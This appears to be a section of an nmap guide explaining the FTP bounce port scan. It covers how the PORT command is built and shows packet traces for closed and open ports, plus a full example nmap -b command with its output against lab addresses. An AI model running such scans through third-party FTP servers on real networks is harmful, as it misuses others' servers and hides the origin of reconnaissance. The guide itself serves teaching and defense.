FTP Bounce Attack(-b <ftp_relay_host>)
Requires Privileged Access: NO
Identifies TCP Ports: YES
Identifies UDP Ports: NO

The FTP bounce attack is infamous in the network security world. The modern threat associated with this attack methodology has been nullified by the retooling of most FTP services, rendering this particular attack more interesting for its technical process than for its potential maliciousness. Like idlescan, the FTP bounce attack uses a third workstation to act as a proxy between the nmap host and the destination station.


A popular detailed discussion of the ftp bounce attack was written by "Hobbit" on the Bugtraq mailing list. A copy of the message can be found at this location:

http://www.insecure.org/nmap/hobbit.ftpbounce.txt

clock
The FTP bounce attack uses an FTP server in passive mode to transmit information to any device on the network. For a detailed explanation of active mode FTP vs. passive mode FTP, refer to this site:

http://slacksite.com/other/ftp.html



FTP Bounce Attack Operation
The FTP bounce attack wouldn't be possible if it weren't for passive mode FTP. With passive mode FTP, the command connections are completely separate from the data connections. This allows the FTP server to work well with firewalls because the FTP server is responsible for building the outbound data connection with the remote host. However, it also means that a user could send a PORT command to an FTP server that would direct the data towards a completely different host!

From a security perspective, a "bounceable" FTP server is a serious concern. For the purposes of port scanning, however, this situation couldn't be more convenient! The FTP bounce attack takes advantage of these poorly-configured FTP servers to provide nmap with a unique method of locating open ports.

To begin the bounce attack process, nmap must login to the FTP server that will be used as the "middleman." Once connected to the FTP server, nmap sends the PORT command to direct all data connections to the destination IP address and TCP port.

The PORT command has a unique syntax. The PORT command is followed by six numbers that are separated by commas. The first four numbers refer to the four octets of the destination IP address, and the last two numbers refer to the port number on the remote device. To calculate the port number into decimal, multiply the second-to-last number by 256 and add it to the last number. For example, the command PORT 192,168,0,5,2,44 refers to IP address 192.168.0.5 and port (2*256)+44, or port 556.

Once the nmap source specifies the port command, it sends a LIST command to launch the data connection over the specified IP address and TCP port. The FTP server then attempts a connection with the device specified in the PORT command.

A closed port will result with the FTP server informing the source station that the FTP server can't build the connection:

b_closed
Source        Destination   Summary 
--------------------------------------------------------------------------------------
[192.168.0.8] [192.168.0.7] FTP: C PORT=37205   PORT 192,168,0,5,0,93
[192.168.0.7] [192.168.0.8] FTP: R PORT=37205   200 PORT command successful.
[192.168.0.8] [192.168.0.7] FTP: C PORT=37205   LIST
[192.168.0.7] [192.168.0.5] TCP: D=93 S=20 SYN SEQ=474501024 LEN=0 WIN=65535
[192.168.0.5] [192.168.0.7] TCP: D=20 S=93 RST ACK=474501025 WIN=0
[192.168.0.7] [192.168.0.8] FTP: R PORT=37205   425 Can't build data connection: Connection refused.
An open port completes the transfer over the specified connection:

b_open
Source        Destination   Summary 
--------------------------------------------------------------------------------------
[192.168.0.8] [192.168.0.7] FTP: C PORT=37205   PORT 192,168,0,5,0,135
[192.168.0.7] [192.168.0.8] FTP: R PORT=37205   200 PORT command successful.
[192.168.0.8] [192.168.0.7] FTP: C PORT=37205   LIST
[192.168.0.7] [192.168.0.5] TCP: D=135 S=20 SYN SEQ=4240951199 LEN=0 WIN=65535
[192.168.0.5] [192.168.0.7] TCP: D=20 S=135 SYN ACK=4240951200 SEQ=2193395373 LEN=0 WIN=65535
[192.168.0.7] [192.168.0.5] TCP: D=135 S=20     ACK=2193395374 WIN<<1=65700
[192.168.0.7] [192.168.0.8] FTP: R PORT=37205   150 Opening ASCII mode data connection for '/bin/ls'.
[192.168.0.7] [192.168.0.8] FTP: R PORT=37205   226 Transfer complete.
[192.168.0.7] [192.168.0.5] FTP: R PORT=135   Text Data
The nmap output shows the results of the FTP bounce scan. Since the bounce scan is often performed through firewalls, nmap adds a reminder to include the "don't ping" option (-P0) on the command line.
# nmap -v -b anonymous:[email protected] 192.168.0.5
Hint: if your bounce scan target hosts aren't reachable from here, remember to
use -P0 so we don't try and ping them prior to the scan

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-04-23 20:37 EDT
Resolved ftp bounce attack proxy to 192.168.0.7 (192.168.0.7).
Attempting connection to ftp://anonymous:[email protected]:21
Connected:Login credentials accepted by ftp server!
Initiating TCP ftp bounce scan against 192.168.0.5 at 20:37
Discovered open port 6969/tcp on 192.168.0.5
Discovered open port 135/tcp on 192.168.0.5
Discovered open port 139/tcp on 192.168.0.5
Discovered open port 445/tcp on 192.168.0.5
Scanned 1663 ports in 9 seconds via the Bounce scan.
Host 192.168.0.5 appears to be up ... good.
Interesting ports on 192.168.0.5:
(The 1659 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
6969/tcp open  acmsoda
MAC Address: 00:11:43:43:A8:34 (Dell   (WW Pcba Test))

Nmap finished: 1 IP address (1 host up) scanned in 20.602 seconds
               Raw packets sent: 2 (68B) | Rcvd: 1 (46B)
#